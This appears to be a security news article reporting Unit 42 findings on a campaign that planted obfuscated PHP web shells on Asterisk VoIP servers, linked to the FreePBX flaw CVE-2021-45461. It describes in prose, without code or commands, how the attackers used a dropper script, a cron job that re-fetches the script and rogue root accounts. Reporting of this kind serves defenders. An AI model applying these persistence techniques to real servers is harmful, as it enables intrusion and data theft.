VoIP servers are the target of hackers using Digium Phone Software

Share This Post

The unusual activity is said to have commenced in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server. Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, alluding to the possibility that they could be a “resurgence” of the previous attacks.

A web shell was dropped on the servers of VoIP phones running Digium’s software as part of an attack operation meant to exfiltrate data by downloading and running additional payloads. In a report released on Friday, Palo Alto Networks Unit 42 stated that the malware “instals multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution, and schedules recurrent tasks to re-infect the host machine.”


  • It further creates a scheduled task that runs every minute and fetches a remote copy of the shell script from the attacker-controlled domain for execution. Besides taking measures to cover its tracks, the malware is also equipped to run arbitrary commands, ultimately allowing the hackers to take control of the system, steal information, while also maintaining a backdoor to the compromised hosts.

  • Coinciding with the sudden surge is the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, a web-based open source GUI that’s used to control and manage Asterisk. Tracked as CVE-2021-45461, the issue is rated 9.8 out of 10 for severity. The attacks commence with retrieving an initial dropper shell script from a remote server, which, in turn, is orchestrated to install the PHP web shell in different locations in the file system as well as create two root user accounts to maintain remote access.

“The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors,” the researchers said, adding it’s a “common approach malware authors take to launch exploits or run commands remotely.” Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.


Related Posts

Visionary planning for IT modernization is essential to delivering next generation IT services

Today’s technological advancement is advancing at such a rapid...

For Linux 6.0, F2FS low memory mode, atomic write improvements

The new low-memory mode introduced by F2FS with Linux...

Free games on PlayStation, Xbox and PC this weekend (12-14 August)

We are approaching the second weekend the way we...

Smash Boats is receiving a Couch Co-Op update and also an Xbox version: GameSpew

Sure, playing online can be fun but there’s nothing...

Redeem free paid games for Android too

In this regard, even in the week preceding the...